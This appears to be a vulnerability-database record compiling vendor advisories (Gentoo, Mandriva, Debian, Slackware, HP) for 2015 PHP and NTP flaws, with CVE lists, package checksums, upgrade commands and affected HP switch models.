- - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in PHP, the worst of which\ncould lead to arbitrary code execution, or cause a Denial of Service\ncondition. \n\nBackground\n==========\n\nPHP is a widely-used general-purpose scripting language that is\nespecially suited for Web development and can be embedded into HTML. Please review the\nCVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll PHP 5.4 users should upgrade to the latest 5.5 stable branch, as\nPHP 5.4 is now masked in Portage:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev=lang/php-5.5.33\"\n\nAll PHP 5.5 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev=lang/php-5.5.33\"\n\nAll PHP 5.6 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev=lang/php-5.6.19\"\n\nReferences\n==========\n\n[ 1 ] CVE-2013-6501\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6501\n[ 2 ] CVE-2014-9705\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9705\n[ 3 ] CVE-2014-9709\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9709\n[ 4 ] CVE-2015-0231\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0231\n[ 5 ] CVE-2015-0273\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0273\n[ 6 ] CVE-2015-1351\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1351\n[ 7 ] CVE-2015-1352\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1352\n[ 8 ] CVE-2015-2301\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2301\n[ 9 ] CVE-2015-2348\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2348\n[ 10 ] CVE-2015-2783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2783\n[ 11 ] CVE-2015-2787\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2787\n[ 12 ] CVE-2015-3329\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3329\n[ 13 ] CVE-2015-3330\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3330\n[ 14 ] CVE-2015-4021\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4021\n[ 15 ] CVE-2015-4022\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4022\n[ 16 ] CVE-2015-4025\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4025\n[ 17 ] CVE-2015-4026\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4026\n[ 18 ] CVE-2015-4147\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4147\n[ 19 ] CVE-2015-4148\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4148\n[ 20 ] CVE-2015-4642\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4642\n[ 21 ] CVE-2015-4643\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4643\n[ 22 ] CVE-2015-4644\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4644\n[ 23 ] CVE-2015-6831\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6831\n[ 24 ] CVE-2015-6832\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6832\n[ 25 ] CVE-2015-6833\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6833\n[ 26 ] CVE-2015-6834\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6834\n[ 27 ] CVE-2015-6835\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6835\n[ 28 ] CVE-2015-6836\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6836\n[ 29 ] CVE-2015-6837\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6837\n[ 30 ] CVE-2015-6838\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6838\n[ 31 ] CVE-2015-7803\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7803\n[ 32 ] CVE-2015-7804\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7804\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201606-10\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n. \n \n Buffer Overflow when parsing tar/zip/phar in phar_set_inode\n (CVE-2015-3329). \n \n Potential remote code execution with apache 2.4 apache2handler\n (CVE-2015-3330). \n \n Additionally the timezonedb packages has been upgraded to the latest\n version and the PECL packages which requires so has been rebuilt\n for php-5.5.24. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2783\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3329\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3330\n http://advisories.mageia.org/MGASA-2015-0169.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n fb5b4628263a821fb3e4075a5fb4e5b4 mbs1/x86_64/apache-mod_php-5.5.24-1.mbs1.x86_64.rpm\n 3c7f76ada5ccad65c212ee350fdffe87 mbs1/x86_64/lib64php5_common5-5.5.24-1.mbs1.x86_64.rpm\n 5400e21c3eaecc346e1eb8c712e9478f mbs1/x86_64/php-apc-3.1.15-1.18.mbs1.x86_64.rpm\n 90ae23234441a8de169207ff7f045684 mbs1/x86_64/php-apc-admin-3.1.15-1.18.mbs1.x86_64.rpm\n a39b53bcacc941035d830ce1052540b3 mbs1/x86_64/php-bcmath-5.5.24-1.mbs1.x86_64.rpm\n ada97c19882cf313e4d7ebba0909f6d8 mbs1/x86_64/php-bz2-5.5.24-1.mbs1.x86_64.rpm\n c6e5c880827c6bc76dfb1c15460637b4 mbs1/x86_64/php-calendar-5.5.24-1.mbs1.x86_64.rpm\n 6535a7223184cec5ac17edb9e1d31388 mbs1/x86_64/php-cgi-5.5.24-1.mbs1.x86_64.rpm\n 16aa52d7dd47cc27cb5d7aec420944eb mbs1/x86_64/php-cli-5.5.24-1.mbs1.x86_64.rpm\n 7983f9d1bf3039b5efdb0ed70329cccd mbs1/x86_64/php-ctype-5.5.24-1.mbs1.x86_64.rpm\n 3cbc805a1610b54d191e2e3ca99c3ae4 mbs1/x86_64/php-curl-5.5.24-1.mbs1.x86_64.rpm\n f53dd6f08013c00ae1c95df14671624e mbs1/x86_64/php-dba-5.5.24-1.mbs1.x86_64.rpm\n e2a5d632a8581e27a366191c9fd86424 mbs1/x86_64/php-devel-5.5.24-1.mbs1.x86_64.rpm\n 37bb13541a04b935c93600dc63e98047 mbs1/x86_64/php-doc-5.5.24-1.mbs1.noarch.rpm\n fad46645f9afb86eedf094cbe82eaebe mbs1/x86_64/php-dom-5.5.24-1.mbs1.x86_64.rpm\n 22141396e7bccb2aac8a2e7c0d0f02aa mbs1/x86_64/php-enchant-5.5.24-1.mbs1.x86_64.rpm\n e3f7bc72aad9e3fb7b9f25f64d9ca95c mbs1/x86_64/php-exif-5.5.24-1.mbs1.x86_64.rpm\n 53a76b203f90a9008eb35cdf93aac246 mbs1/x86_64/php-fileinfo-5.5.24-1.mbs1.x86_64.rpm\n 7cb8c9592f48413f3783f49947563a8f mbs1/x86_64/php-filter-5.5.24-1.mbs1.x86_64.rpm\n 3d34478d09bbf6848c8c2eaea0156feb mbs1/x86_64/php-fpm-5.5.24-1.mbs1.x86_64.rpm\n fc47e9e9b740e94e5210854b7872af8f mbs1/x86_64/php-ftp-5.5.24-1.mbs1.x86_64.rpm\n e22e5cf59f7d0c361b41e220fd0ebbde mbs1/x86_64/php-gd-5.5.24-1.mbs1.x86_64.rpm\n cd5fef5777b58e0562ddeb3ca4b4e1dd mbs1/x86_64/php-gettext-5.5.24-1.mbs1.x86_64.rpm\n aba136588f2c77f2cca4bcc300e7f0b5 mbs1/x86_64/php-gmp-5.5.24-1.mbs1.x86_64.rpm\n 8752b1e4f863b2cdadf08cfdcaf462f7 mbs1/x86_64/php-hash-5.5.24-1.mbs1.x86_64.rpm\n 36bef8c7e03cdffd66a4553266e1a13d mbs1/x86_64/php-iconv-5.5.24-1.mbs1.x86_64.rpm\n 0b405f5f49d174745a4135e033fbe234 mbs1/x86_64/php-imap-5.5.24-1.mbs1.x86_64.rpm\n fc25a10fb623016b5e95595aa114274a mbs1/x86_64/php-ini-5.5.24-1.mbs1.x86_64.rpm\n c4435a44b199cd4fadca0cac247aca06 mbs1/x86_64/php-intl-5.5.24-1.mbs1.x86_64.rpm\n ec611fd14d6b502990fe0a3ab243211a mbs1/x86_64/php-json-5.5.24-1.mbs1.x86_64.rpm\n 519c8ae2df9aeca23d15953470c3a485 mbs1/x86_64/php-ldap-5.5.24-1.mbs1.x86_64.rpm\n f52168266f3d1df5a333f2acb83c7739 mbs1/x86_64/php-mbstring-5.5.24-1.mbs1.x86_64.rpm\n 8fed199f0b2be5b2d1780bed11c5c5d6 mbs1/x86_64/php-mcrypt-5.5.24-1.mbs1.x86_64.rpm\n e5d5276bcfaa7d951b4b543e76949a2f mbs1/x86_64/php-mssql-5.5.24-1.mbs1.x86_64.rpm\n 0a34a8334cd8a3e4d7867a962df62f15 mbs1/x86_64/php-mysql-5.5.24-1.mbs1.x86_64.rpm\n 3fd0dcc4cb8c4ef136c68e243788aa85 mbs1/x86_64/php-mysqli-5.5.24-1.mbs1.x86_64.rpm\n d9db3dd5963888f69b11cdaa1d1c97e4 mbs1/x86_64/php-mysqlnd-5.5.24-1.mbs1.x86_64.rpm\n f27cbd0c9f968bfa7d6f10d8040a1f4f mbs1/x86_64/php-odbc-5.5.24-1.mbs1.x86_64.rpm\n db18ba83bd3e8f82f189c4e93799de9a mbs1/x86_64/php-opcache-5.5.24-1.mbs1.x86_64.rpm\n 7e02eaad2751f993fcd7af5a649b4707 mbs1/x86_64/php-openssl-5.5.24-1.mbs1.x86_64.rpm\n be43bdb8b4c0ea65901bb7ab4a12e1be mbs1/x86_64/php-pcntl-5.5.24-1.mbs1.x86_64.rpm\n 57ba222e0921de0efcad052a1ed359cc mbs1/x86_64/php-pdo-5.5.24-1.mbs1.x86_64.rpm\n 3ba50d22dead03f756136363e1e2ce27 mbs1/x86_64/php-pdo_dblib-5.5.24-1.mbs1.x86_64.rpm\n fe6858486fc7a42f7099f103fec8e0c9 mbs1/x86_64/php-pdo_mysql-5.5.24-1.mbs1.x86_64.rpm\n 407570e83b281be3515970aa6e24a773 mbs1/x86_64/php-pdo_odbc-5.5.24-1.mbs1.x86_64.rpm\n e5c66883133694a146b0f4840749a7d7 mbs1/x86_64/php-pdo_pgsql-5.5.24-1.mbs1.x86_64.rpm\n d41508abccb63d3b0c0d44a82596f1d6 mbs1/x86_64/php-pdo_sqlite-5.5.24-1.mbs1.x86_64.rpm\n 3f7dd514cca5b5259854043194099c4c mbs1/x86_64/php-pgsql-5.5.24-1.mbs1.x86_64.rpm\n 1b6b8a0d2e033b35697757a49329d51e mbs1/x86_64/php-phar-5.5.24-1.mbs1.x86_64.rpm\n 30e86f3079cd49241d680f46542b16b8 mbs1/x86_64/php-posix-5.5.24-1.mbs1.x86_64.rpm\n b065951f2e32008908857708ae2f1539 mbs1/x86_64/php-readline-5.5.24-1.mbs1.x86_64.rpm\n 13886e31952529313c505acbc7ebbbc6 mbs1/x86_64/php-recode-5.5.24-1.mbs1.x86_64.rpm\n 95ca2a29237d6f3e6f852431626be072 mbs1/x86_64/php-session-5.5.24-1.mbs1.x86_64.rpm\n f5f33541bc2a3b3f0b456989e20aa45c mbs1/x86_64/php-shmop-5.5.24-1.mbs1.x86_64.rpm\n c5414a148aa0e25b03b9faf79c50693a mbs1/x86_64/php-snmp-5.5.24-1.mbs1.x86_64.rpm\n d02afd660db7544b09328445c2f99ec6 mbs1/x86_64/php-soap-5.5.24-1.mbs1.x86_64.rpm\n 239a1c675cf3a4f853cc94cfc188e60e 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The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\nCVE-2015-4024\n\n Denial of service when processing multipart/form-data requests. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 5.4.41-0+deb7u1. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.9+dfsg-0+deb8u1. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 5.6.9+dfsg-1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 5.6.9+dfsg-1. \n\nWe recommend that you upgrade your php5 packages",
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"db": "BID",
"id": "74240",
"ident": null
},
{
"date": "2015-04-20T19:22:00",
"db": "PACKETSTORM",
"id": "131528",
"ident": null
},
{
"date": "2015-07-09T23:16:17",
"db": "PACKETSTORM",
"id": "132618",
"ident": null
},
{
"date": "2015-06-23T14:07:16",
"db": "PACKETSTORM",
"id": "132406",
"ident": null
},
{
"date": "2016-06-19T15:55:00",
"db": "PACKETSTORM",
"id": "137539",
"ident": null
},
{
"date": "2015-04-27T16:21:20",
"db": "PACKETSTORM",
"id": "131640",
"ident": null
},
{
"date": "2015-06-10T01:21:58",
"db": "PACKETSTORM",
"id": "132198",
"ident": null
},
{
"date": "2015-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201505-041",
"ident": null
},
{
"date": "2015-06-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-003046",
"ident": null
},
{
"date": "2015-06-09T18:59:02.537000",
"db": "NVD",
"id": "CVE-2015-3329",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2019-12-27T00:00:00",
"db": "VULHUB",
"id": "VHN-81290",
"ident": null
},
{
"date": "2019-12-27T00:00:00",
"db": "VULMON",
"id": "CVE-2015-3329",
"ident": null
},
{
"date": "2016-07-05T21:28:00",
"db": "BID",
"id": "74240",
"ident": null
},
{
"date": "2019-12-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201505-041",
"ident": null
},
{
"date": "2015-10-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-003046",
"ident": null
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2015-3329",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "131528"
},
{
"db": "PACKETSTORM",
"id": "132406"
},
{
"db": "CNNVD",
"id": "CNNVD-201505-041"
}
],
"trust": 0.8
},
"title": {
"_id": null,
"data": "PHP of phar_internal.h of phar_set_inode Stack-based buffer overflow vulnerability in functions",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-003046"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201505-041"
}
],
"trust": 0.6
}
}
VAR-201504-0362
Vulnerability from variot - Updated: 2026-04-10 22:57The symmetric-key feature in the receive function in ntp_proto.c in ntpd in NTP 3.x and 4.x before 4.2.8p2 performs state-variable updates upon receiving certain invalid packets, which makes it easier for man-in-the-middle attackers to cause a denial of service (synchronization loss) by spoofing the source IP address of a peer. NTP Project ntpd reference implementation accepts unauthenticated packets with symmetric key cryptography and does not protect symmetric associations against denial of service attacks. NTP of ntpd of ntp_proto.c Inside receive of symmetric-key The function is used even when a specific invalid packet is received. state variable Service operation disruption to perform update ( Sync failure ) There are vulnerabilities that are put into a state. Supplementary information : CWE Vulnerability type by CWE-17: Code ( code ) Has been identified. http://cwe.mitre.org/data/definitions/17.htmlMan-in-the-middle attacks (man-in-the-middle attack) By the source of the peer IP Denial of service by spoofing addresses ( Sync failure ) There is a possibility of being put into a state. NTP is prone to a denial-of-service vulnerability. Successful exploits may allow the attacker to cause a denial-of-service condition. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201509-01
https://security.gentoo.org/
Severity: Normal Title: NTP: Multiple vulnerablities Date: September 24, 2015 Bugs: #545836, #553682 ID: 201509-01
Synopsis
Multiple vulnerabilities have been found in NTP, the worst of which could lead to arbitrary code execution.
Background
NTP contains software for the Network Time Protocol.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/ntp < 4.2.8_p3 >= 4.2.8_p3
Description
Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All NTP users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8_p3"
References
[ 1 ] CVE-2015-1798 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1798 [ 2 ] CVE-2015-1799 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1799 [ 3 ] CVE-2015-5146 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5146
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201509-01
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 .
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p2-i486-1_slack14.1.txz: Upgraded. * Authentication doesn't protect symmetric associations against DoS attacks. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1798 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1799 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p2-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p2-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p2-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p2-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p2-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p2-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p2-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p2-i486-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p2-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 570bb3e4bb7b065101fa4963e757d7e7 ntp-4.2.8p2-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: e6add42a70a66496be2d4978370c2799 ntp-4.2.8p2-x86_64-1_slack13.0.txz
Slackware 13.1 package: 99f1cfa5e23a256d840ed0a56b7f9400 ntp-4.2.8p2-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 0a6622196521e084d36cda13fc6da824 ntp-4.2.8p2-x86_64-1_slack13.1.txz
Slackware 13.37 package: 28cfe042c585cf036582ce5f0c2daadf ntp-4.2.8p2-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: c436da55cd2d113142410a9d982c5ac5 ntp-4.2.8p2-x86_64-1_slack13.37.txz
Slackware 14.0 package: cf69f8ecb5e4c1902dfb22d0f9685278 ntp-4.2.8p2-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 9c8344ec56d5d2335fd7370e2f9cf639 ntp-4.2.8p2-x86_64-1_slack14.0.txz
Slackware 14.1 package: 9dcf0eafa851ad018f8341c2fb9307b5 ntp-4.2.8p2-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: e0c063f4e46a72ec86012a46299a46df ntp-4.2.8p2-x86_64-1_slack14.1.txz
Slackware -current package: 5f72de16e3bb6cd216e7694a49671cee n/ntp-4.2.8p2-i486-1.txz
Slackware x86_64 -current package: 1ba531770e4a2ae6e8e7116aaa26523e n/ntp-4.2.8p2-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8p2-i486-1_slack14.1.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04679309
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04679309 Version: 1
HPSBUX03333 SSRT102029 rev.1 - HP-UX Running NTP, Remote Denial of Service (DoS), or Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-05-19 Last Updated: 2015-05-19
Potential Security Impact: Remote Denial of Service (DoS), or other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP-UX running NTP. These could be exploited remotely to create a Denial of Service (DoS), or other vulnerabilities.
References:
CVE-2015-1798 - Symmetric-Key feature allows MAC address spoofing (CWE-17) CVE-2015-1799 - Symmetric-Key feature allows denial of service (CWE-17) SSRT102029 CERT-VU#852879
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.31 running NTP v4.x, specifically version C.4.2.6.5.0 or previous
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2015-1798 (AV:A/AC:H/Au:N/C:N/I:P/A:N) 1.8 CVE-2015-1799 (AV:A/AC:M/Au:N/C:N/I:P/A:P) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following solution for HP-UX B.11.31.
A new B.11.31 depot for HP-UX-NTP_C.4.2.6.6.0 is available here:
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber =HPUX-NTP
Reference: http://support.ntp.org/bin/view/Main/SecurityNotice
MANUAL ACTIONS: Yes - Update
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.31
NTP.INETSVCS2-BOOT NTP.NTP-AUX NTP.NTP-RUN action: install revision C.4.2.6.6.0 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 19 May 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iEYEARECAAYFAlVbxaIACgkQ4B86/C0qfVmiSgCg8hSMo6ue+WJXM0G6Cz7zSw+Z E7wAn1Y5Occ9WtyV0+W9iD/1QWizxwZN =Wku3 -----END PGP SIGNATURE----- . Comware 7 (CW7) Products - all versions prior to the fixed versions in the Resolution section below.
-
12500 (Comware 7) - Version: Fix in R7375
- HP Network Products
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JC072B HP 12500 Main Processing Unit
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
- JG803A HP FlexFabric 12500E TAA-compliant Main Processing Unit
-
10500 (Comware 7) - Version: Fix in R7169P01
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA w/Comware v7 OS MPU
-
12900 (Comware 7) - Version: Fix in R1137
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
-
5900 (Comware 7) - Version: Fix in R2422P01
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
- JG296A HP 5920AF-24XG Switch
- JG555A HP 5920AF-24XG TAA Switch
-
MSR1000 (Comware 7) - Version: Fix in R0106P33
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
-
MSR2000 (Comware 7) - Version: Fix in R0106P33
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
-
MSR3000 (Comware 7) - Version: Fix in R0106P33
